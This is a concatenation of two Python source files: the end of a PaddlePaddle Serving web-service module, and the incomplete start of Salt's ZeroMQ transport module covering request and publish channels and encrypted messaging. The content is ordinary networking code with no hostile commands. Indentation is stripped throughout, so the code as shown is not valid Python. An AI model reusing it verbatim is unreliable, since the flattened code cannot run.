else:
infer_op_name = "general_infer"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
server = Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_device(device)
server.set_precision(precision)
server.set_use_calib(use_calib)
if use_lite:
server.set_lite()
if use_xpu:
server.set_xpu()
server.load_model_config(self.server_config_dir_paths
) #brpc Server support server_config_dir_paths
if gpuid >= 0:
server.set_gpuid(gpuid)
server.prepare_server(workdir=workdir, port=port, device=device)
return server
def _launch_rpc_service(self, service_idx):
self.rpc_service_list[service_idx].run_server()
def create_rpc_config(self):
if len(self.gpus) == 0:
# init cpu service
self.rpc_service_list.append(
self.default_rpc_service(
self.workdir,
self.port_list[0],
-1,
thread_num=self.thread_num,
mem_optim=self.mem_optim,
use_lite=self.use_lite,
use_xpu=self.use_xpu,
ir_optim=self.ir_optim,
precision=self.precision,
use_calib=self.use_calib))
else:
for i, gpuid in enumerate(self.gpus):
self.rpc_service_list.append(
self.default_rpc_service(
"{}_{}".format(self.workdir, i),
self.port_list[i],
gpuid,
thread_num=self.thread_num,
mem_optim=self.mem_optim,
use_lite=self.use_lite,
use_xpu=self.use_xpu,
ir_optim=self.ir_optim,
precision=self.precision,
use_calib=self.use_calib))
def prepare_server(self,
workdir="",
port=9393,
device="gpu",
precision="fp32",
use_calib=False,
use_lite=False,
use_xpu=False,
ir_optim=False,
gpuid=0,
thread_num=2,
mem_optim=True):
print("This API will be deprecated later. Please do not use it")
self.workdir = workdir
self.port = port
self.thread_num = thread_num
self.device = device
self.precision = precision
self.use_calib = use_calib
self.use_lite = use_lite
self.use_xpu = use_xpu
self.ir_optim = ir_optim
self.mem_optim = mem_optim
self.gpuid = gpuid
self.port_list = []
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
self.port_list.append(default_port + i)
if len(self.port_list) > len(self.gpus):
break
def _launch_web_service(self):
gpu_num = len(self.gpus)
self.client = Client()
self.client.load_client_config(self.client_config_path)
endpoints = ""
if gpu_num > 0:
for i in range(gpu_num):
endpoints += "127.0.0.1:{},".format(self.port_list[i])
else:
endpoints = "127.0.0.1:{}".format(self.port_list[0])
self.client.connect([endpoints])
def get_prediction(self, request):
if not request.json:
abort(400)
try:
feed, fetch, is_batch, dt_boxes = self.preprocess(request.json["feed"],
["save_infer_model/scale_0.tmp_1"])
if isinstance(feed, dict) and "fetch" in feed:
del feed["fetch"]
if len(feed) == 0:
raise ValueError("empty input")
fetch_map = self.client.predict(
feed=feed, fetch=fetch, batch=is_batch)
result = self.postprocess(
feed=request.json["feed"], fetch=fetch, fetch_map=fetch_map)
result = {"result": result}
except ValueError as err:
result = {"result": str(err)}
return result
def run_rpc_service(self):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
server_pros = []
self.create_rpc_config()
for i, service in enumerate(self.rpc_service_list):
p = Process(target=self._launch_rpc_service, args=(i, ))
server_pros.append(p)
for p in server_pros:
p.start()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_web_service()
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
# TODO: maybe change another API name: maybe run_local_predictor?
def run_debugger_service(self, gpu=True):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_local_predictor(gpu)
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
def _launch_local_predictor(self, gpu):
        # LocalPredictor acts like an in-process server, but from the
        # WebService's point of view it plays the role of a client.
        # local_predictor only supports a single model dir path (str),
        # so the input must be self.server_config_dir_paths[0]
from paddle_serving_app.local_predict import LocalPredictor
self.client = LocalPredictor()
if gpu:
# if user forget to call function `set_gpus` to set self.gpus.
# default self.gpus = [0].
if len(self.gpus) == 0:
self.gpus.append(0)
self.client.load_model_config(
self.server_config_dir_paths[0],
use_gpu=True,
gpu_id=self.gpus[0])
else:
self.client.load_model_config(
self.server_config_dir_paths[0], use_gpu=False)
def run_web_service(self):
print("This API will be deprecated later. Please do not use it")
self.app_instance.run(host="0.0.0.0", port=self.port)
def get_app_instance(self):
return self.app_instance
def preprocess(self, feed=[], fetch=[]):
print("This API will be deprecated later. Please do not use it")
is_batch = True
feed_dict = {}
for var_name in self.feed_vars.keys():
feed_dict[var_name] = []
for feed_ins in feed:
for key in feed_ins:
feed_dict[key].append(
np.array(feed_ins[key]).reshape(
list(self.feed_vars[key].shape))[np.newaxis, :])
feed = {}
for key in feed_dict:
feed[key] = np.concatenate(feed_dict[key], axis=0)
return feed, fetch, is_batch,[]
def postprocess(self, feed=[], fetch=[], fetch_map=None):
print("This API will be deprecated later. Please do not use it")
for key in fetch_map:
fetch_map[key] = fetch_map[key].tolist()
return fetch_map
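# --- usage sketch (assumption, not part of the original module) ---
# Walks the (deprecated) RPC + Flask path implemented above. The model
# directory, workdir, and port are hypothetical placeholders.
def _example_start_service():
    service = WebService(name="example")
    service.load_model_config("serving_server")   # dir containing serving_server_conf.prototxt
    service.prepare_server(workdir="workdir", port=9292, device="cpu")
    service.run_rpc_service()                     # start brpc workers and build the Flask app
    service.run_web_service()                     # blocks, serving /example/prediction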
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import os
import copy
import errno
import hashlib
import logging
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
import salt.ext.six as six
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
zmq.eventloop.ioloop.install()
io_loop = tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
if key not in loop_instance_map:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
try:
return loop_instance_map[key]
except KeyError:
# In iterating over the loop_instance_map, we may have triggered
# garbage collection. Therefore, the key is no longer present in
# the map. Re-gen and add to map.
log.debug('Initializing new AsyncZeroMQReqChannel due to GC for {0}'.format(key))
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
return loop_instance_map[key]
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop',):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClient(result.opts,
self.master_uri,
io_loop=result._io_loop))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
zmq.eventloop.ioloop.install()
self._io_loop = tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
            # we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClient(self.opts,
self.master_uri,
io_loop=self._io_loop,
)
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
            # Return control back to the caller; continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
raise tornado.gen.Return(pcrypt.loads(ret[dictkey]))
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
:param int timeout: The number of seconds on a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
            # We may not always get data back; for example, a salt-call return
            # submission is a blind communication: we do not subscribe to return
            # events, we just upload the results to the master.
if data:
data = self.auth.crypticle.loads(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
            # First attempt; on an authentication error we re-authenticate below and retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(six.b(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.IDENTITY, self.opts['id'])
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
# TODO: Optionally call stream.close() on newer pyzmq? Its broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
        # if it was only one message, then it's the old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
if messages[0] not in ('broadcast', self.hexid):
log.debug('Publish received for not this minion: {0}'.format(messages[0]))
raise tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
            raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                             'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
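# Usage sketch (names are illustrative): register a handler with
#     channel.on_recv(handle_payload)
# and handle_payload(payload) will be called with each decoded publish that
# targets this minion; calling on_recv(None) stops delivery.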
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
            # The socket monitor is only used for debug purposes, so using threading here is acceptable
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
self._closing = True
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
        Handle incoming messages from underlying TCP streams
        :param ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc:
log.error('Bad load from minion: %s: %s', type(exc).__name__, exc)
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
match_ids = self.ckminions.check_minions(load['tgt'],
expr_form=load['tgt_type']
)
log.debug("Publish Side Match: {0}".format(match_ids))
            # Send the list of minions through so zmq can target them
int_payload['topic_lst'] = match_ids
pub_sock.send(self.serial.dumps(int_payload))
pub_sock.close()
context.term()
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
    This class wraps the underlying zeromq REQ socket and gives a future-based
    interface to sending and receiving messages. This works around the primary
    limitation of serialized send/recv on the underlying socket by queueing the
    message sends in this class. In the future, if we decide to attempt to multiplex,
    we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial.
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
        :param str addr: The master address to connect the REQ socket to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
zmq.eventloop.ioloop.install()
            self.io_loop = tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.stream = None
self.socket.close()
if self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
self._set_tcp_keepalive()
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
def _set_tcp_keepalive(self):
'''
Ensure that TCP keepalives are set for the ReqServer.
Warning: Failure to set TCP keepalives can result in frequent or unexpected
disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and self.opts:
if 'tcp_keepalive' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
